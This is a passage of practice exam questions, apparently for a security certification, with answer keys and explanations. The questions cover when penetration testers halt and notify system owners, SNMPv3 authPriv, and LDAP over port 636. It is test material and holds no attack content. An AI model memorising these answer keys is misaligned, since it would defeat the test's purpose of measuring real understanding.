Explanation OBJ-5.3: The BEST protections for the data would involve enabling full disk encryption and configuring the ability to perform a remote wipe. Even if the device is lost or stolen, its data would be unreadable if it was using full disk encryption. Additionally, by configuring the ability to wipe the device’s storage remotely, the data would be erased before a thief can access it.

Question 82

Which of the following would trigger the penetration test to stop and contact the system owners during an engagement?

A.A production server is unresponsive after attempting exploitation

B.Discovery of two servers not documented in the architecture diagrams

C.Discovery of encrypted PII personal data being stored on the system

D.A production server is unresponsive to ping requests

Answer 82

A.A production server is unresponsive after attempting exploitation

Explanation OBJ-5.4: The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contract their trusted point of contact within the organization to get further guidance.

Question 83

You are configuring a network to utilize SNMPv3 to send information from your network devices back to an SNMP manager.

Which of the following SNMP options should you enable to ensure the data is transferred confidentially?

A.authPriv

B.authNoPriv

C.authProtect

D.authEncrypt

Answer 83

A.authPriv

Explanation OBJ-5.3: In SNMPv3, the authPriv option ensures that the communications are sent with authentication and privacy. This uses MD5 and SHA for authentication and DES and AES for privacy and encryption.

Question 84

Which of the following would trigger the penetration tester to stop and contact the system owners during an engagement?

A.Discovery of obfuscated PHI data being stored on the system

B.Discovery of an indicator of compromise on a production server

C.Discovery of missing Windows security patches on a production s server

D.Discovery of default credentials on an application in a staging network

Answer 84

B.Discovery of an indicator of compromise on a production server

Explanation OBJ-5.4: The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contract their trusted point of contact within the organization to get further guidance.

Question 85

You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636.

The security scanning software recommends that you remediate this by changing user authentication to port to 636 wherever possible.

What should you do?

A.Conduct remediation actions to update encryption keys on each server to match port 636

B.Mark this as a false positive in your audit report since the service that typically run on ports 389 and 636 are identical

C.Change all devices and servers that support it to port 636 since encrypted services run by default on port 636

D.Change all devices and servers that support it to port 636 since port 389 is a reserved port that requires root access and can expose the server to privilege escalation attacks

Answer 85

C.Change all devices and servers that support it to port 636 since encrypted services run by default on port 636

Explanation OBJ-5.3: LDAP can be run on either port 389 or port 636. Port 389 is the standard port for LDAP but typically runs unencrypted LDAP services over this port. Instead, you should change all devices and servers that can technically support the change to port 636 since LDAP services over port 636 are encrypted by default.